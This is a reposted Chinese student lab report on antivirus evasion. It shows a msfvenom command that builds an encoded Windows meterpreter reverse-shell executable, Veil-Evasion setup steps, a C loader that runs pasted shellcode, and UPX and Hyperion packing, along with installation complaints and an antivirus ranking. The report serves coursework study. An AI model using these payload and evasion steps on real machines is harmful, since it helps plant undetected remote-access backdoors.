其他分享
首页 > 其他分享> > 2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践

作者:互联网

免杀原理与实践

目录


知识点

基础问题回答

↑back


实验内容

任务一

1. 正确使用msf编码器

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.131 LPORT=5326 -f exe > met-encoded.exe
\\'-e':指定编码方式
\\'-i':指定编码次数
\\'-b':去除指定代码,一般是空代码或者错误代码
\\'-f':指定生成格式。


2. msfvenom生成如jar之类的其他文件

感觉是不是跟msf有一丢丢像?然后...wsl,安装路程过于坎坷最后屈服了,拷了别人的虚拟机 [我一定要跟它死磕到底flag]

sudo apt-get install veil-evasion \\这条直接成功概率好小啊
veil \\打开veil
use ....\\balabala进行配置
set ....\\kali的ip和要用的port
\\生成文件
\\查看文件


unsigned char buf[] = 
\\这段就是刚刚生成的那一段复制过来

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

1. 搞个压缩壳,这里用的upx

UPX 是一款先进的可执行程序文件压缩器。压缩过的可执行文件体积缩小50%-70%,这样减少了磁盘占用空间、网络上传下载的时间和其它分布以及存储费用。它也会被用来给木马和病毒加壳,躲避杀毒软件的查杀。壳upx是一种保护程序。一般是EXE文件的一种外保护措施,主要用途 :
1、让正规文件被保护起来,不容易被修改和破解。
2、使文件压缩变小。
3、保护杀毒软件安装程序,使之不受病毒侵害。
4、木马,病毒的保护外壳,使之难以为攻破。

2.再来个加密壳,hyperion

  1. veil装不好,我回来补
  2. 桥接换网,kali的ip地址一直都出不来,vmnet0桥接然后改成WiFi适配就能直接上网(要是遇到了可以试一下)

↑back

心得体会

最大的体会:veil真是太难装了,完全不知道问题出在哪里,等我装好了一定给大家做一个完全的教程【吐血】。发现这些杀毒软件都很有意思,给大家排个名:360、腾讯 > 金山毒霸(真的垃圾,啥都扫不出来,全程无查杀说的就是ta.劝大家下载前两个不说了我先去下一个)。总的来说还是学到了各种免杀方法
↑back

标签:文件,exe,免杀,20165326,Exp3,恶意代码,5326,加壳
来源: https://www.cnblogs.com/Czzzz/p/10632769.html